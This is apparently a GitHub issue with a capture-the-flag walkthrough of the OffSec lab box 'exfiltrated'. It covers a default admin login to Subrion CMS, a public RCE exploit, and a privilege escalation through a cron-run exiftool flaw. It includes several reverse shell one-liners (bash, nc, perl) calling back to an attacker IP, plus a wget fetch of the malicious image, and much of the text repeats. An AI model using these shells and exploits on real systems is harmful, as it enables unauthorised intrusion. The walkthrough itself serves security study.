Open WDavid404 opened 1 month ago
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu)) -- http-title: Did not follow redirect to http://exfiltrated.offsec/
sudo vi /etc/hosts --> add exfiltrated.offsec
see the source code of web page --> Subrion 4.2
and from the page (/panel), we can know version is 4.2.1
Try admin/admin login to http://exfiltrated.offsec/panel --> succeed
searchsploit Subrion 4.2 --> 49876.py
Try python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin --> it work (Note: URL must be '/panle/' --> '/panle' doesn't work )
python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
Try reverse shell command refer to https://www.revshells.com/
bash -c 'bash -i >& /dev/tcp/192.168.45.192/4444 0>&1' nc -e /bin/bash 192.168.45.192 4444 perl -e 'use Socket;$i="192.168.45.192";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---> didn't work
Try 'perl no sh' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' --> it works.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
upgrade the shell: python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color cat /etc/crontab -->
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
cat image-exif.sh -->
#! /bin/bash #07/06/18 A BASH script to collect EXIF metadata echo -ne "\\n metadata directory cleaned! \\n\\n" IMAGES='/var/www/html/subrion/uploads' META='/opt/metadata' FILE=`openssl rand -hex 5` LOGFILE="$META/$FILE" echo -ne "\\n Processing EXIF metadata now... \\n\\n" ls $IMAGES | grep "jpg" | while read filename; do exiftool "$IMAGES/$filename" >> $LOGFILE <---import!! done echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
The key point is "exiftool "$IMAGES/$filename" >> $LOGFILE" command. Search 'exiftool exploit' in google --> https://www.exploit-db.com/exploits/50911
exiftool "$IMAGES/$filename" >> $LOGFILE
sudo apt update sudo apt install djvulibre-bin python3 50911.py -s 192.168.45.192 4444
-->
Upload image.jpg to /var/www/html/subrion/uploads www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpg
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpg
Get a reverse shell from the target host
sudo vi /etc/hosts --> add exfiltrated.offsec
see the source code of web page --> Subrion 4.2
and from the page (/panel), we can know version is 4.2.1
Try admin/admin login to http://exfiltrated.offsec/panel --> succeed
searchsploit Subrion 4.2 --> 49876.py
Try
python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin--> it work (Note: URL must be '/panle/' --> '/panle' doesn't work )Try reverse shell command refer to https://www.revshells.com/
---> didn't work
Try 'perl no sh'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'--> it works.upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256colorcat /etc/crontab -->cat image-exif.sh -->
The key point is "
exiftool "$IMAGES/$filename" >> $LOGFILE" command. Search 'exiftool exploit' in google --> https://www.exploit-db.com/exploits/50911-->
Upload image.jpg to /var/www/html/subrion/uploads
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpgGet a reverse shell from the target host